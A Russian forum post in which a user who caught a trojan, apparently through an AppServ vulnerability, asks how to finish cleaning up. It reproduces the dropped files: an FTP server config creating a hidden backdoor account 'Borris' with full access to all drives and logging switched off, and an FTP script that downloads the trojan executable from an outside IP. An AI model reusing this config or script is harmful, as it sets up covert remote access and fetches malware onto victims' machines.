Пожалуйста подождите

Троян MSIntskmngr... Первый раз такой вижу.

29 ноября 15:04
Рейтинг 0 - +    Эмоции
комментариев: 6
Сегодня словил какойто странный троян. Скорей всего из-за дырки в appserv.

КИС немного поругался, 2 раза пробывал вылечить, 2 раза убить и 2 раза пропустить. Так я и не понял убил он его или нет.

Троян создал учетку Borris пропароленную, но правда с ограниченным доступом. И на appserv\'е создал 2 файлы:

mspaintfixd.tmp
[EXTERNAL]
EventHookDLL1=JAcheck.dll
EventHookDLL1=JAstat.dll
[GLOBAL]
Versi 5.2.0.0
ProcessID=3884
[DOMAINS]
Domain1=0.0.0.0||3344|88.70.78.233|1|0|0
[Domain1]
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
LogFileSystemMes=0
LogFileSecurityMes=0
LogFileGETs=0
LogFilePUTs=0
User1=Borris|1|0
ReplyHello=Str0 presented by Borris
[USER=Borris|1]
Password=epD69FA2418E0D06D2E33B21A5C946E8F3
HomeDir=c:\\
HideHidden=1
TimeOut=600
Maintenance=System
Access1=h:\\|RWAMELCDP
Access2=i:\\|RWAMELCDP
Access3=C:\\|RWAMELCDP
Access4=a:\\|RWAMELCDP
Access5=b:\\|RWAMELCDP
Access6=d:\\|RWAMELCDP
Access7=e:\\|RWAMELCDP
Access8=f:\\|RWAMELCDP
Access9=g:\\|RWAMELCDP
SKEYValues=


windows.txt
open 74.13.74.235
user anonymous anonymous
get MSIntskmngr.exe
get mspaintfixd.tmp
quit


Удалил файлы, учетку. Что еще надо сделать?
Метки меток нет

комментарии

К первому непрочитанному